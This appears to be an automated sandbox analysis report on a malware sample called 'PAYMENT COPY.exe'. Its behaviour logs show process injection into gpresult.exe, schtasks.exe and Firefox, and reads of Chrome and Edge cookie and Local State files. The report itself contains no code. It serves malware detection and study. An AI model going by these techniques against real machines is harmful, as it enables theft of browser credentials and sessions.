Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtTerminateThread: Direct from: 0x77387B2E	Jump to behavior
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtDelayExecution: Direct from: 0x77392DDC
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtWriteVirtualMemory: Direct from: 0x77392E3C	Jump to behavior
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtCreateMutant: Direct from: 0x773935CC
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtResumeThread: Direct from: 0x773936AC
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtMapViewOfSection: Direct from: 0x77392D1C
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtOpenKeyEx: Direct from: 0x77392B9C
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtSetInformationProcess: Direct from: 0x77392C5C
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtProtectVirtualMemory: Direct from: 0x77392F9C
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtNotifyChangeKey: Direct from: 0x77393C2C
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtQueryInformationToken: Direct from: 0x77392CAC
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtCreateFile: Direct from: 0x77392FEC
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtOpenFile: Direct from: 0x77392DCC
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtTerminateThread: Direct from: 0x77392FCC
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtDeviceIoControlFile: Direct from: 0x77392AEC
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtAllocateVirtualMemory: Direct from: 0x77392BEC
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtQuerySystemInformation: Direct from: 0x773948CC
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtQueryVolumeInformationFile: Direct from: 0x77392F2C	Jump to behavior
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtAllocateVirtualMemory: Direct from: 0x773948EC	Jump to behavior
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtOpenSection: Direct from: 0x77392E0C
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtAllocateVirtualMemory: Direct from: 0x77393C9C
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtSetInformationThread: Direct from: 0x773863F9
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtClose: Direct from: 0x77392B6C
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtSetInformationThread: Direct from: 0x77392B4C
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtReadVirtualMemory: Direct from: 0x77392E8C	Jump to behavior
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtCreateKey: Direct from: 0x77392C6C
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	NtQueryAttributesFile: Direct from: 0x77392E6C

Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Memory written: C:\Users\user\Desktop\PAYMENT COPY.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Memory written: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: NULL target: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Section loaded: NULL target: C:\Windows\SysWOW64\gpresult.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Section loaded: NULL target: C:\Windows\SysWOW64\schtasks.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Section loaded: NULL target: C:\Windows\SysWOW64\gpresult.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: NULL target: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: NULL target: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Section loaded: NULL target: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe protection: execute and read and write

Windows Analysis Report PAYMENT COPY.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
PAYMENT COPY.exe

Malware Threat Intel
Provided by

Source: JBOkmqufMEGwlAXNwkIjNoQeH.exe, 0000000C.00000000.2543196481.0000000000E11000.00000002.00000001.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 0000000C.00000002.4946958963.0000000000E11000.00000002.00000001.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000000.2758566823.0000000000E11000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: JBOkmqufMEGwlAXNwkIjNoQeH.exe, 0000000C.00000000.2543196481.0000000000E11000.00000002.00000001.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 0000000C.00000002.4946958963.0000000000E11000.00000002.00000001.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000000.2758566823.0000000000E11000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: JBOkmqufMEGwlAXNwkIjNoQeH.exe, 0000000C.00000000.2543196481.0000000000E11000.00000002.00000001.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 0000000C.00000002.4946958963.0000000000E11000.00000002.00000001.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000000.2758566823.0000000000E11000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: JBOkmqufMEGwlAXNwkIjNoQeH.exe, 0000000C.00000000.2543196481.0000000000E11000.00000002.00000001.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 0000000C.00000002.4946958963.0000000000E11000.00000002.00000001.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000000.2758566823.0000000000E11000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Queries volume information: C:\Users\user\Desktop\PAYMENT COPY.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.3031.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Queries volume information: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\gpresult.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\gpresult.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
